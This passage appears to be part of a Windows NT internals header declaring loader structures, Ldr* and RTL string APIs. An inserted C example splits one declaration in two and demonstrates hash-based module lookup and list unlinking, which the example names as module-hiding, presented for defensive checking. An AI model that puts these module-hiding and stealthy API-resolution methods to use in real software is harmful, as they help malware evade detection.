LdrGetProcedureAddressEx Flags // #define LDR_GET_PROCEDURE_ADDRESS_DONT_RECORD_FORWARDER 0x00000001 #define RESOURCE_TYPE_LEVEL 0 #define RESOURCE_NAME_LEVEL 1 #define RESOURCE_LANGUAGE_LEVEL 2 #define RESOURCE_DATA_LEVEL 3 typedef struct _LDR_RESOURCE_INFO { ULONG_PTR Type; ULONG_PTR Name; ULONG Lang; } LDR_RESOURCE_INFO, * PLDR_RESOURCE_INFO; typedef struct _LDR_DATA_TABLE_ENTRY_COMPATIBLE { LIST_ENTRY InLoadOrderLinks; LIST_ENTRY InMemoryOrderLinks; union { LIST_ENTRY InInitializationOrderLinks; LIST_ENTRY InProgressLinks; } DUMMYUNION0; PVOID DllBase; PVOID EntryPoint; ULONG SizeOfImage; UNICODE_STRING FullDllName; UNICODE_STRING BaseDllName; union { ULONG 
Flags; struct { ULONG PackagedBinary : 1; // Size=4 Offset=104 BitOffset=0 BitCount=1 ULONG MarkedForRemoval : 1; // Size=4 Offset=104 BitOffset=1 BitCount=1 ULONG ImageDll : 1; // Size=4 Offset=104 BitOffset=2 BitCount=1 ULONG LoadNotificationsSent : 1; // Size=4 Offset=104 BitOffset=3 BitCount=1 ULONG TelemetryEntryProcessed : 1; // Size=4 Offset=104 BitOffset=4 BitCount=1 ULONG ProcessStaticImport : 1; // Size=4 Offset=104 BitOffset=5 BitCount=1 ULONG InLegacyLists : 1; // Size=4 Offset=104 BitOffset=6 BitCount=1 ULONG InIndexes : 1; // Size=4 Offset=104 BitOffset=7 BitCount=1 ULONG ShimDll : 1; // Size=4 Offset=104 BitOffset=8 BitCount=1 ULONG InExceptionTable : 1; // Size=4 Offset=104 BitOffset=9 BitCount=1 ULONG ReservedFlags1 : 2; // Size=4 Offset=104 BitOffset=10 BitCount=2 ULONG LoadInProgress : 1; // Size=4 Offset=104 BitOffset=12 BitCount=1 ULONG LoadConfigProcessed : 1; // Size=4 Offset=104 BitOffset=13 BitCount=1 ULONG EntryProcessed : 1; // Size=4 Offset=104 BitOffset=14 BitCount=1 ULONG ProtectDelayLoad : 1; // Size=4 Offset=104 BitOffset=15 BitCount=1 ULONG ReservedFlags3 : 2; // Size=4 Offset=104 BitOffset=16 BitCount=2 ULONG DontCallForThreads : 1; // Size=4 Offset=104 BitOffset=18 BitCount=1 ULONG ProcessAttachCalled : 1; // Size=4 Offset=104 BitOffset=19 BitCount=1 ULONG ProcessAttachFailed : 1; // Size=4 Offset=104 BitOffset=20 BitCount=1 ULONG CorDeferredValidate : 1; // Size=4 Offset=104 BitOffset=21 BitCount=1 ULONG CorImage : 1; // Size=4 Offset=104 BitOffset=22 BitCount=1 ULONG DontRelocate : 1; // Size=4 Offset=104 BitOffset=23 BitCount=1 ULONG CorILOnly : 1; // Size=4 Offset=104 BitOffset=24 BitCount=1 ULONG ChpeImage : 1; // Size=4 Offset=104 BitOffset=25 BitCount=1 ULONG ReservedFlags5 : 2; // Size=4 Offset=104 BitOffset=26 BitCount=2 ULONG Redirected : 1; // Size=4 Offset=104 BitOffset=28 BitCount=1 ULONG ReservedFlags6 : 2; // Size=4 Offset=104 BitOffset=29 BitCount=2 ULONG CompatDatabaseProcessed : 1; // Size=4 Offset=104 
BitOffset=31 BitCount=1 }; } ENTRYFLAGSUNION; WORD ObsoleteLoadCount; WORD TlsIndex; union { LIST_ENTRY HashLinks; struct { PVOID SectionPointer; ULONG CheckSum; }; } DUMMYUNION1; union { ULONG TimeDateStamp; PVOID LoadedImports; } DUMMYUNION2; //fields below removed for compatibility, if you need them use LDR_DATA_TABLE_ENTRY_FULL } LDR_DATA_TABLE_ENTRY_COMPATIBLE, * PLDR_DATA_TABLE_ENTRY_COMPATIBLE; typedef LDR_DATA_TABLE_ENTRY_COMPATIBLE LDR_DATA_TABLE_ENTRY; typedef LDR_DATA_TABLE_ENTRY_COMPATIBLE* PLDR_DATA_TABLE_ENTRY; typedef LDR_DATA_TABLE_ENTRY* PCLDR_DATA_TABLE_ENTRY; typedef BOOLEAN(NTAPI* PLDR_INIT_ROUTINE)( _In_ PVOID DllHandle, _In_ ULONG Reason, _In_opt_ PVOID Context ); typedef struct _LDR_SERVICE_TAG_RECORD { struct _LDR_SERVICE_TAG_RECORD* Next; ULONG ServiceTag; } LDR_SERVICE_TAG_RECORD, * PLDR_SERVICE_TAG_RECORD; typedef struct _LDRP_CSLIST { PSINGLE_LIST_ENTRY Tail; } LDRP_CSLIST, * PLDRP_CSLIST; typedef enum _LDR_DDAG_STATE { LdrModulesMerged = -5, LdrModulesInitError = -4, LdrModulesSnapError = -3, LdrModulesUnloaded = -2, LdrModulesUnloading = -1, LdrModulesPlaceHolder = 0, LdrModulesMapping = 1, LdrModulesMapped = 2, LdrModulesWaitingForDependencies = 3, LdrModulesSnapping = 4, LdrModulesSnapped = 5, LdrModulesCondensed = 6, LdrModulesReadyToInit = 7, LdrModulesInitializing = 8, LdrModulesReadyToRun = 9 } LDR_DDAG_STATE; typedef struct _LDR_DDAG_NODE { LIST_ENTRY Modules; PLDR_SERVICE_TAG_RECORD ServiceTagList; ULONG LoadCount; ULONG LoadWhileUnloadingCount; ULONG LowestLink; union { LDRP_CSLIST Dependencies; SINGLE_LIST_ENTRY RemovalLink; }; LDRP_CSLIST IncomingDependencies; LDR_DDAG_STATE State; SINGLE_LIST_ENTRY CondenseLink; ULONG PreorderNumber; } LDR_DDAG_NODE, * PLDR_DDAG_NODE; typedef enum _LDR_HOT_PATCH_STATE { LdrHotPatchBaseImage = 0, LdrHotPatchNotApplied = 1, LdrHotPatchAppliedReverse = 2, LdrHotPatchAppliedForward = 3, LdrHotPatchFailedToPatch = 4, LdrHotPatchStateMax = 5, } LDR_HOT_PATCH_STATE, * PLDR_HOT_PATCH_STATE; // // 
Full declaration of LDR_DATA_TABLE_ENTRY // typedef struct _LDR_DATA_TABLE_ENTRY_FULL { LIST_ENTRY InLoadOrderLinks; LIST_ENTRY InMemoryOrderLinks; union { LIST_ENTRY InInitializationOrderLinks; LIST_ENTRY InProgressLinks; }; PVOID DllBase; PLDR_INIT_ROUTINE EntryPoint; ULONG SizeOfImage; UNICODE_STRING FullDllName; UNICODE_STRING BaseDllName; union { UCHAR FlagGroup[4]; ULONG Flags; struct { ULONG PackagedBinary : 1; ULONG MarkedForRemoval : 1; ULONG ImageDll : 1; ULONG LoadNotificationsSent : 1; ULONG TelemetryEntryProcessed : 1; ULONG ProcessStaticImport : 1; ULONG InLegacyLists : 1; ULONG InIndexes : 1; ULONG ShimDll : 1; ULONG InExceptionTable : 1; ULONG ReservedFlags1 : 2; ULONG LoadInProgress : 1; ULONG LoadConfigProcessed : 1; ULONG EntryProcessed : 1; ULONG ProtectDelayLoad : 1; ULONG ReservedFlags3 : 2; ULONG DontCallForThreads : 1; ULONG ProcessAttachCalled : 1; ULONG ProcessAttachFailed : 1; ULONG CorDeferredValidate : 1; ULONG CorImage : 1; ULONG DontRelocate : 1; ULONG CorILOnly : 1; ULONG ChpeImage : 1; ULONG ChpeEmulatorImage : 1; ULONG ReservedFlags5 : 1; ULONG Redirected : 1; ULONG ReservedFlags6 : 2; ULONG CompatDatabaseProcessed : 1; }; }; USHORT ObsoleteLoadCount; USHORT TlsIndex; LIST_ENTRY HashLinks; ULONG TimeDateStamp; PACTIVATION_CONTEXT EntryPointActivationContext; PVOID Lock; PLDR_DDAG_NODE DdagNode; LIST_ENTRY NodeModuleLink; PVOID LoadContext; PVOID ParentDllBase; PVOID SwitchBackContext; RTL_BALANCED_NODE BaseAddressIndexNode; RTL_BALANCED_NODE MappingInfoIndexNode; ULONG_PTR OriginalBase; LARGE_INTEGER LoadTime; ULONG BaseNameHashValue; LDR_DLL_LOAD_REASON LoadReason; ULONG ImplicitPathOptions; ULONG ReferenceCount; ULONG DependentLoadFlags; UCHAR SigningLevel; ULONG CheckSum; PVOID ActivePatchImageBase; LDR_HOT_PATCH_STATE HotPatchState; } LDR_DATA_TABLE_ENTRY_FULL, * PLDR_DATA_TABLE_ENTRY_FULL; typedef struct _LDR_DLL_LOADED_NOTIFICATION_DATA { ULONG Flags; //Reserved. 
PCUNICODE_STRING FullDllName; //The full path name of the DLL module. PCUNICODE_STRING BaseDllName; //The base file name of the DLL module. PVOID DllBase; //A pointer to the base address for the DLL in memory. ULONG SizeOfImage; //The size of the DLL image, in bytes. } LDR_DLL_LOADED_NOTIFICATION_DATA, * PLDR_DLL_LOADED_NOTIFICATION_DATA; typedef struct _LDR_DLL_UNLOADED_NOTIFICATION_DATA { ULONG Flags; //Reserved. PCUNICODE_STRING FullDllName; //The full path name of the DLL module. PCUNICODE_STRING BaseDllName; //The base file name of the DLL module. PVOID DllBase; //A pointer to the base address for the DLL in memory. ULONG SizeOfImage; //The size of the DLL image, in bytes. } LDR_DLL_UNLOADED_NOTIFICATION_DATA, * PLDR_DLL_UNLOADED_NOTIFICATION_DATA; typedef union _LDR_DLL_NOTIFICATION_DATA { LDR_DLL_LOADED_NOTIFICATION_DATA Loaded; LDR_DLL_UNLOADED_NOTIFICATION_DATA Unloaded; } LDR_DLL_NOTIFICATION_DATA, * PLDR_DLL_NOTIFICATION_DATA; typedef const LDR_DLL_NOTIFICATION_DATA* PCLDR_DLL_NOTIFICATION_DATA; typedef VOID(NTAPI *PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION)( _In_ PCLDR_DATA_TABLE_ENTRY DataTableEntry, _In_ PVOID Context, _Inout_ BOOLEAN *StopEnumeration ); typedef VOID(CALLBACK *PLDR_DLL_NOTIFICATION_FUNCTION)( _In_ ULONG NotificationReason, _In_ PCLDR_DLL_NOTIFICATION_DATA NotificationData, _In_opt_ PVOID Context); #ifndef LDR_IS_DATAFILE #define LDR_IS_DATAFILE(DllHandle) (((ULONG_PTR)(DllHandle)) & (ULONG_PTR)1) #endif #ifndef LDR_IS_IMAGEMAPPING #define LDR_IS_IMAGEMAPPING(DllHandle) (((ULONG_PTR)(DllHandle)) & (ULONG_PTR)2) #endif #ifndef LDR_IS_RESOURCE #define LDR_IS_RESOURCE(DllHandle) (LDR_IS_IMAGEMAPPING(DllHandle) || LDR_IS_DATAFILE(DllHandle)) #endif #ifndef IMAGE_FILE_MACHINE_CHPE_X86 #define IMAGE_FILE_MACHINE_CHPE_X86 0x3A64 #endif #ifndef IMAGE_FILE_MACHINE_ARM64EC #define IMAGE_FILE_MACHINE_ARM64EC 0xA641 #endif #ifndef IMAGE_FILE_MACHINE_ARM64X #define IMAGE_FILE_MACHINE_ARM64X 0xA64E #endif NTSYSAPI NTSTATUS NTAPI 
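The LIST_ENTRY inlines and the LDR_DATA_TABLE_ENTRY layouts declared above are what every PEB->Ldr module-list walk relies on, whether it is the loader itself (the full entry caches a case-insensitive hash of BaseDllName in BaseNameHashValue for its hash-table lookups) or position-independent code that resolves modules by hashed name instead of by string. The following is an added example, not code from UACMe or from ntos.h: a portable C re-creation of the InitializeListHead/InsertTailList/RemoveEntryList semantics, a MODULE_ENTRY that models the relevant fields of LDR_DATA_TABLE_ENTRY, the X65599 hash that RtlHashUnicodeString (declared further down in this header) implements, and a bounded, NULL-checked walk that finds a module by case-insensitive name and confirms the name after the hash matches. The LIST_ENTRY, UNICODE_STRING and CONTAINING_RECORD definitions, the MODULE_ENTRY type, the module names and the base addresses are constructed stand-ins so the file builds and runs outside Windows; ASCII-only upcasing is assumed in place of RtlUpcaseUnicodeChar, and that Windows stores exactly this value in BaseNameHashValue is an assumption, not something this header states.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Portable stand-ins for the NT types the loader lists use (assumed layout:
 * 16-bit WCHAR, UNICODE_STRING.Length counted in bytes). */
typedef uint16_t WCHAR;
typedef struct _LIST_ENTRY { struct _LIST_ENTRY *Flink; struct _LIST_ENTRY *Blink; } LIST_ENTRY, *PLIST_ENTRY;
typedef struct _UNICODE_STRING { uint16_t Length; uint16_t MaximumLength; WCHAR *Buffer; } UNICODE_STRING;
#define CONTAINING_RECORD(addr, type, field) ((type *)((char *)(addr) - offsetof(type, field)))

/* Constructed subset of LDR_DATA_TABLE_ENTRY: list link, base, size, name and
 * the cached name hash the full entry keeps in BaseNameHashValue. */
typedef struct _MODULE_ENTRY {
    LIST_ENTRY InLoadOrderLinks;
    void *DllBase;
    uint32_t SizeOfImage;
    UNICODE_STRING BaseDllName;
    uint32_t BaseNameHashValue;
} MODULE_ENTRY;

/* Same semantics as the wdm.h inlines declared in this header. */
static void InitializeListHead(PLIST_ENTRY h) { h->Flink = h->Blink = h; }
static int IsListEmpty(const LIST_ENTRY *h) { return h->Flink == h; }
static void InsertTailList(PLIST_ENTRY h, PLIST_ENTRY e) {
    PLIST_ENTRY b = h->Blink;
    e->Flink = h; e->Blink = b; b->Flink = e; h->Blink = e;
}
static int RemoveEntryList(PLIST_ENTRY e) {   /* returns 1 if the list is now empty */
    PLIST_ENTRY f = e->Flink, b = e->Blink;
    b->Flink = f; f->Blink = b;
    return f == b;
}

static WCHAR upcase_ascii(WCHAR c) { return (c >= 'a' && c <= 'z') ? (WCHAR)(c - 32) : c; }

/* HASH_STRING_ALGORITHM_X65599: h = h * 65599 + ch for each WCHAR.
 * Assumption: ASCII-only upcasing stands in for RtlUpcaseUnicodeChar. */
static uint32_t hash_x65599(const UNICODE_STRING *s, int case_insensitive) {
    uint32_t h = 0;
    for (size_t i = 0; i < s->Length / sizeof(WCHAR); i++) {
        WCHAR c = s->Buffer[i];
        h = h * 65599u + (case_insensitive ? upcase_ascii(c) : c);
    }
    return h;
}

/* Fill a UNICODE_STRING from an ASCII literal using caller-owned storage. */
static void init_ustr(UNICODE_STRING *s, WCHAR *buf, size_t cap, const char *ascii) {
    size_t n = strlen(ascii);
    if (n > cap) n = cap;
    for (size_t i = 0; i < n; i++) buf[i] = (WCHAR)(unsigned char)ascii[i];
    s->Buffer = buf;
    s->Length = (uint16_t)(n * sizeof(WCHAR));
    s->MaximumLength = (uint16_t)(cap * sizeof(WCHAR));
}

static uint32_t hash_ascii(const char *name, int case_insensitive) {
    WCHAR buf[64]; UNICODE_STRING s;
    init_ustr(&s, buf, 64, name);
    return hash_x65599(&s, case_insensitive);
}

static int ustr_equal_ci(const UNICODE_STRING *a, const UNICODE_STRING *b) {
    if (a->Length != b->Length) return 0;
    for (size_t i = 0; i < a->Length / sizeof(WCHAR); i++)
        if (upcase_ascii(a->Buffer[i]) != upcase_ascii(b->Buffer[i])) return 0;
    return 1;
}

/* Bounded, NULL-checked walk (cf. ASSERT_LIST_ENTRY_VALID above): a corrupted
 * or half-unlinked list must neither spin forever nor dereference NULL. The
 * hash is only a fast filter; the name is compared before an entry is used. */
#define MAX_WALK 4096
static MODULE_ENTRY *find_module(PLIST_ENTRY head, const char *name) {
    WCHAR buf[64]; UNICODE_STRING want;
    init_ustr(&want, buf, 64, name);
    uint32_t want_hash = hash_x65599(&want, 1);
    unsigned steps = 0;
    for (PLIST_ENTRY p = head->Flink; p != NULL && p != head && steps < MAX_WALK; p = p->Flink, steps++) {
        MODULE_ENTRY *m = CONTAINING_RECORD(p, MODULE_ENTRY, InLoadOrderLinks);
        if (m->BaseNameHashValue == want_hash && ustr_equal_ci(&m->BaseDllName, &want)) return m;
    }
    return NULL;
}

static size_t list_length(PLIST_ENTRY head) {
    size_t n = 0;
    for (PLIST_ENTRY p = head->Flink; p != NULL && p != head && n < MAX_WALK; p = p->Flink) n++;
    return n;
}

static void add_module(PLIST_ENTRY head, MODULE_ENTRY *m, WCHAR *buf, const char *name, uintptr_t base) {
    init_ustr(&m->BaseDllName, buf, 32, name);
    m->DllBase = (void *)base;
    m->SizeOfImage = 0x1000;
    m->BaseNameHashValue = hash_x65599(&m->BaseDllName, 1);
    InsertTailList(head, &m->InLoadOrderLinks);
}

/* Constructed three-module list (names and bases are made up). Returns the
 * kernel32 base found by case-insensitive lookup, after proving that unlinking
 * user32 (what module-hiding code does) makes it unreachable; 0 on failure. */
static uintptr_t demo_lookup(void) {
    LIST_ENTRY head; MODULE_ENTRY ntdll, k32, u32; WCHAR b0[32], b1[32], b2[32];
    InitializeListHead(&head);
    if (!IsListEmpty(&head)) return 0;
    add_module(&head, &ntdll, b0, "ntdll.dll", 0x10000000u);
    add_module(&head, &k32, b1, "KERNEL32.DLL", 0x20000000u);
    add_module(&head, &u32, b2, "user32.dll", 0x30000000u);
    MODULE_ENTRY *m = find_module(&head, "kernel32.dll");
    if (m == NULL || list_length(&head) != 3) return 0;
    if (RemoveEntryList(&u32.InLoadOrderLinks)) return 0;   /* two entries must remain */
    if (find_module(&head, "user32.dll") != NULL || list_length(&head) != 2) return 0;
    return (uintptr_t)m->DllBase;
}

int main(void) {
    printf("kernel32 base: 0x%lx\n", (unsigned long)demo_lookup());
    return 0;
}
```

On Windows the same walk starts from `&NtCurrentPeb()->Ldr->InLoadOrderModuleList` with `CONTAINING_RECORD(p, LDR_DATA_TABLE_ENTRY, InLoadOrderLinks)`; a defender comparing the three PEB lists against each other, or against LdrEnumerateLoadedModules, is doing exactly the unlink check shown in `demo_lookup`.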
LdrAccessResource( _In_ PVOID DllHandle, _In_ CONST IMAGE_RESOURCE_DATA_ENTRY* ResourceDataEntry, _Out_opt_ PVOID *Address, _Out_opt_ PULONG Size); NTSYSAPI NTSTATUS NTAPI LdrAddRefDll( _In_ ULONG Flags, _In_ PVOID DllHandle); NTSYSAPI NTSTATUS NTAPI LdrEnumerateLoadedModules( _In_ ULONG Flags, _In_ PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION CallbackFunction, _In_opt_ PVOID Context); NTSYSAPI NTSTATUS NTAPI LdrFindResource_U( _In_ PVOID DllHandle, _In_ CONST ULONG_PTR* ResourceIdPath, _In_ ULONG ResourceIdPathLength, _Out_ PIMAGE_RESOURCE_DATA_ENTRY *ResourceDataEntry); NTSYSAPI NTSTATUS NTAPI LdrFindResourceEx_U( _In_ ULONG Flags, _In_ PVOID DllHandle, _In_ PLDR_RESOURCE_INFO ResourceInfo, _In_ ULONG Level, _Out_ PIMAGE_RESOURCE_DATA_ENTRY* ResourceDataEntry); NTSYSAPI NTSTATUS NTAPI LdrFindResourceDirectory_U( _In_ PVOID DllHandle, _In_ PLDR_RESOURCE_INFO ResourceInfo, _In_ ULONG Level, _Out_ PIMAGE_RESOURCE_DIRECTORY *ResourceDirectory); NTSYSAPI NTSTATUS NTAPI LdrFindEntryForAddress( _In_ PVOID Address, _Out_ PLDR_DATA_TABLE_ENTRY *TableEntry); NTSYSAPI NTSTATUS NTAPI LdrGetDllHandle( _In_opt_ PCWSTR DllPath, _In_opt_ PULONG DllCharacteristics, _In_ PCUNICODE_STRING DllName, _Out_ PVOID *DllHandle); NTSYSAPI NTSTATUS NTAPI LdrGetDllHandleEx( _In_ ULONG Flags, _In_opt_ PWSTR DllPath, _In_opt_ PULONG DllCharacteristics, _In_ PUNICODE_STRING DllName, _Out_opt_ PVOID *DllHandle); NTSYSAPI NTSTATUS NTAPI LdrGetDllHandleByMapping( _In_ PVOID BaseAddress, _Out_ PVOID *DllHandle); NTSYSAPI NTSTATUS NTAPI LdrGetDllHandleByName( _In_opt_ PUNICODE_STRING BaseDllName, _In_opt_ PUNICODE_STRING FullDllName, _Out_ PVOID *DllHandle); NTSYSAPI NTSTATUS NTAPI LdrGetDllFullName( _In_ PVOID DllHandle, _Out_ PUNICODE_STRING FullDllName); NTSYSAPI NTSTATUS NTAPI LdrGetDllDirectory( _Out_ PUNICODE_STRING DllDirectory); NTSYSAPI NTSTATUS NTAPI LdrSetDllDirectory( _In_ PUNICODE_STRING DllDirectory); NTSYSAPI NTSTATUS NTAPI LdrGetProcedureAddress( _In_ PVOID DllHandle, _In_opt_ 
CONST ANSI_STRING* ProcedureName, _In_opt_ ULONG ProcedureNumber, _Out_ PVOID *ProcedureAddress); NTSYSAPI NTSTATUS NTAPI LdrGetProcedureAddressForCaller( _In_ PVOID DllHandle, _In_opt_ PANSI_STRING ProcedureName, _In_opt_ ULONG ProcedureNumber, _Out_ PVOID *ProcedureAddress, _In_ ULONG Flags, _In_ PVOID *Callback); NTSYSAPI NTSTATUS NTAPI LdrGetProcedureAddressEx( _In_ PVOID DllHandle, _In_opt_ PANSI_STRING ProcedureName, _In_opt_ ULONG ProcedureNumber, _Out_ PVOID* ProcedureAddress, _In_ ULONG Flags); NTSYSAPI NTSTATUS NTAPI LdrGetKnownDllSectionHandle( _In_ PCWSTR DllName, _In_ BOOLEAN KnownDlls32, _Out_ PHANDLE Section); NTSYSAPI NTSTATUS NTAPI LdrLoadDll( _In_opt_ PCWSTR DllPath, _In_opt_ PULONG DllCharacteristics, _In_ PCUNICODE_STRING DllName, _Out_ PVOID *DllHandle); NTSYSAPI NTSTATUS NTAPI LdrUnloadDll( _In_ PVOID DllHandle); NTSYSAPI NTSTATUS NTAPI LdrQueryProcessModuleInformation( _Out_ PRTL_PROCESS_MODULES ModuleInformation, _In_ ULONG ModuleInformationLength, _Out_opt_ PULONG ReturnLength); NTSYSAPI NTSTATUS NTAPI LdrRegisterDllNotification( _In_ ULONG Flags, _In_ PLDR_DLL_NOTIFICATION_FUNCTION NotificationFunction, _In_opt_ PVOID Context, _Out_ PVOID *Cookie); NTSYSAPI NTSTATUS NTAPI LdrUnregisterDllNotification( _In_ PVOID Cookie); NTSYSAPI NTSTATUS NTAPI LdrResSearchResource( _In_ PVOID File, _In_ CONST ULONG_PTR* ResIds, _In_ ULONG ResIdCount, _In_ ULONG Flags, _Out_ LPVOID *Resource, _Out_ ULONG_PTR *Size, _In_opt_ USHORT *FoundLanguage, _In_opt_ ULONG *FoundLanguageLength); NTSYSAPI NTSTATUS NTAPI LdrOpenImageFileOptionsKey( _In_ PCUNICODE_STRING ImagePathName, _In_ BOOLEAN Wow64Path, _Out_ PHANDLE KeyHandle); NTSYSAPI NTSTATUS NTAPI LdrQueryImageFileExecutionOptions( _In_ PCUNICODE_STRING ImagePathName, _In_ PCWSTR OptionName, _In_ ULONG Type, _Out_ PVOID Buffer, _In_ ULONG BufferSize, _Out_opt_ PULONG ResultSize); NTSYSAPI BOOLEAN NTAPI LdrIsModuleSxsRedirected( //LdrEntry->Flags->Redirected _In_ PVOID DllHandle); NTSYSAPI NTSTATUS NTAPI 
LdrQueryImageFileExecutionOptionsEx( _In_ PCUNICODE_STRING ImagePathName, _In_ PCWSTR OptionName, _In_ ULONG Type, _Out_ PVOID Buffer, _In_ ULONG BufferSize, _Out_opt_ PULONG ResultSize, _In_ BOOLEAN Wow64Path); NTSYSAPI NTSTATUS NTAPI LdrQueryImageFileKeyOption( _In_ HANDLE KeyHandle, _In_ PCWSTR OptionName, _In_ ULONG Type, _Out_ PVOID Buffer, _In_ ULONG BufferSize, _Out_opt_ PULONG ResultSize); NTSYSAPI NTSTATUS NTAPI LdrDisableThreadCalloutsForDll( _In_ PVOID DllImageBase); #define LDR_LOCK_LOADER_LOCK_FLAG_RAISE_ON_ERRORS 0x00000001 #define LDR_LOCK_LOADER_LOCK_FLAG_TRY_ONLY 0x00000002 #define LDR_LOCK_LOADER_LOCK_DISPOSITION_INVALID 0x00000000 #define LDR_LOCK_LOADER_LOCK_DISPOSITION_LOCK_ACQUIRED 0x00000001 #define LDR_LOCK_LOADER_LOCK_DISPOSITION_LOCK_NOT_ACQUIRED 0x00000002 #define LDR_UNLOCK_LOADER_LOCK_FLAG_RAISE_ON_ERRORS 0x00000001 NTSYSAPI NTSTATUS NTAPI LdrLockLoaderLock( _In_ ULONG Flags, _Out_opt_ ULONG *Disposition, _Out_ PVOID *Cookie); NTSYSAPI NTSTATUS NTAPI LdrUnlockLoaderLock( _In_ ULONG Flags, _Inout_ PVOID Cookie); NTSYSAPI NTSTATUS NTAPI LdrRelocateImage( _In_ PVOID NewBase, _In_opt_ PSTR LoaderName, _In_ NTSTATUS Success, _In_ NTSTATUS Conflict, _In_ NTSTATUS Invalid); NTSYSAPI PIMAGE_BASE_RELOCATION NTAPI LdrProcessRelocationBlock( _In_ ULONG_PTR VA, _In_ ULONG SizeOfBlock, _In_ PUSHORT NextOffset, _In_ LONG_PTR Diff); DECLSPEC_NORETURN NTSYSAPI VOID NTAPI LdrShutdownProcess( VOID); DECLSPEC_NORETURN NTSYSAPI VOID NTAPI LdrShutdownThread( VOID); NTSYSAPI BOOLEAN NTAPI LdrControlFlowGuardEnforced( VOID); /* ** LDR END */ /* ** Runtime Library API START */ /************************************************************************************ * * CSR API. 
* ************************************************************************************/ NTSYSAPI ULONG NTAPI CsrGetProcessId( VOID); NTSYSAPI NTSTATUS NTAPI CsrClientConnectToServer( _In_ PWSTR ObjectDirectory, _In_ ULONG ServerDllIndex, _Inout_ PVOID ConnectionInformation, _Inout_ ULONG *ConnectionInformationLength, _Out_ PBOOLEAN CalledFromServer); /************************************************************************************ * * RTL Strings API. * ************************************************************************************/ #define RTL_DUPLICATE_UNICODE_STRING_NULL_TERMINATE (0x00000001) #define RTL_DUPLICATE_UNICODE_STRING_ALLOCATE_NULL_STRING (0x00000002) #ifndef RtlInitEmptyUnicodeString #define RtlInitEmptyUnicodeString(_ucStr,_buf,_bufSize) \ ((_ucStr)->Buffer = (_buf), \ (_ucStr)->Length = 0, \ (_ucStr)->MaximumLength = (USHORT)(_bufSize)) #endif FORCEINLINE VOID NTAPI RtlInitEmptyAnsiString( _Out_ PANSI_STRING AnsiString, _Pre_maybenull_ _Pre_readable_size_(MaximumLength) PCHAR Buffer, _In_ USHORT MaximumLength ) { memset(AnsiString, 0, sizeof(ANSI_STRING)); AnsiString->MaximumLength = MaximumLength; AnsiString->Buffer = Buffer; } NTSYSAPI BOOLEAN NTAPI RtlCreateUnicodeString( _Out_ PUNICODE_STRING DestinationString, _In_ PCWSTR SourceString); NTSYSAPI BOOLEAN NTAPI RtlCreateUnicodeStringFromAsciiz( _Out_ PUNICODE_STRING DestinationString, _In_ PSTR SourceString); NTSYSAPI VOID NTAPI RtlInitString( _Out_ PSTRING DestinationString, _In_opt_ PCSZ SourceString); NTSYSAPI VOID NTAPI RtlInitUnicodeString( _Out_ PUNICODE_STRING DestinationString, _In_opt_ PCWSTR SourceString); NTSYSAPI NTSTATUS NTAPI RtlInitUnicodeStringEx( _Out_ PUNICODE_STRING DestinationString, _In_opt_ PCWSTR SourceString); NTSYSAPI BOOLEAN NTAPI RtlEqualUnicodeString( _In_ PCUNICODE_STRING String1, _In_ PCUNICODE_STRING String2, _In_ BOOLEAN CaseInSensitive); NTSYSAPI NTSTATUS NTAPI RtlDuplicateUnicodeString( _In_ ULONG Flags, _In_ PUNICODE_STRING StringIn, _Out_ 
PUNICODE_STRING StringOut); NTSYSAPI WCHAR NTAPI RtlUpcaseUnicodeChar( _In_ WCHAR SourceCharacter); NTSYSAPI WCHAR NTAPI RtlDowncaseUnicodeChar( _In_ WCHAR SourceCharacter); NTSYSAPI BOOLEAN NTAPI RtlIsNameInExpression( _In_ PUNICODE_STRING Expression, _In_ PUNICODE_STRING Name, _In_ BOOLEAN IgnoreCase, _In_opt_ PWCH UpcaseTable); NTSYSAPI NTSTATUS NTAPI RtlStringFromGUID( _In_ GUID *Guid, _Out_ PUNICODE_STRING GuidString); NTSYSAPI NTSTATUS NTAPI RtlGUIDFromString( _In_ PUNICODE_STRING GuidString, _Out_ GUID *Guid); NTSYSAPI BOOLEAN NTAPI RtlPrefixUnicodeString( _In_ PCUNICODE_STRING String1, _In_ PCUNICODE_STRING String2, _In_ BOOLEAN CaseInSensitive); NTSYSAPI NTSTATUS NTAPI RtlFormatCurrentUserKeyPath( _Out_ PUNICODE_STRING CurrentUserKeyPath); NTSYSAPI VOID NTAPI RtlFreeUnicodeString( _In_ PUNICODE_STRING UnicodeString); NTSYSAPI VOID NTAPI RtlEraseUnicodeString( _Inout_ PUNICODE_STRING String); NTSYSAPI VOID NTAPI RtlFreeAnsiString( _In_ PANSI_STRING AnsiString); NTSYSAPI NTSTATUS NTAPI RtlAnsiStringToUnicodeString( _Out_ PUNICODE_STRING DestinationString, _In_ PCANSI_STRING SourceString, _In_ BOOLEAN AllocateDestinationString); NTSYSAPI NTSTATUS NTAPI RtlUnicodeStringToAnsiString( _Inout_ PANSI_STRING DestinationString, _In_ PUNICODE_STRING SourceString, _In_ BOOLEAN AllocateDestinationString); NTSYSAPI WCHAR NTAPI RtlAnsiCharToUnicodeChar( _Inout_ PUCHAR *SourceCharacter); NTSYSAPI NTSTATUS NTAPI RtlUnicodeToMultiByteSize( _Out_ PULONG BytesInMultiByteString, _In_reads_bytes_(BytesInUnicodeString) PWCH UnicodeString, _In_ ULONG BytesInUnicodeString); NTSYSAPI BOOLEAN NTAPI RtlDosPathNameToNtPathName_U( _In_ PCWSTR DosFileName, _Out_ PUNICODE_STRING NtFileName, _Out_opt_ PWSTR *FilePart, _Reserved_ PVOID Reserved); NTSYSAPI LONG NTAPI RtlCompareUnicodeStrings( _In_reads_(String1Length) PWCHAR String1, _In_ SIZE_T String1Length, _In_reads_(String2Length) PWCHAR String2, _In_ SIZE_T String2Length, _In_ BOOLEAN CaseInSensitive); NTSYSAPI VOID NTAPI 
